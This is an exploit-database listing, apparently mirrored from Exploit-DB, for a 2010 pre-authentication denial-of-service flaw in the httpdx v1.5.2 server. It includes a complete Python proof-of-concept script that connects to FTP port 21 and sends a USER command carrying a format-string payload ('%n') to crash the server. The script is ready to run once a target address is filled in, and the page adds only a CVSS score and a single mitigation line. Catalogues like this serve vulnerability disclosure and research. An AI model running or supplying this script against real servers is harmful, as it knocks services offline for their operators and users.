header-logo
Suggest Exploit
vendor:
httpdx
by:
loneferret
7.5
CVSS
HIGH
Remote Pre-Authentication DoS
CWE
Product Name: httpdx
Affected Version From: 1.5.2002
Affected Version To: 1.5.2002
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2010

httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)

This exploit causes a denial of service (DoS) by crashing the httpdx v1.5.2 server. It sends a specially crafted buffer to the server, causing it to crash.

Mitigation:

Update to a patched version of httpdx or use an alternative web server software.
Source

Exploit-DB raw data:

# Title: httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)
# Found by: loneferret
# Hat's off to dookie2000ca
# Discovered on: 06/02/2010
# Software link: http://httpdx.sourceforge.net/downloads/
# Tested on: Windows XP SP3 Professional

# Nod to the Exploit-DB Team

#!/usr/bin/python

import socket

buffer = "\x25\x6e"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address
s.recv(1024)
s.send('USER '+ buffer +'\r\n') #yup, doesn't take much does it.
s.recv(1024) #
s.close() #don't really need these, force of habit

Navigation

Suggest Exploit

Services By CQR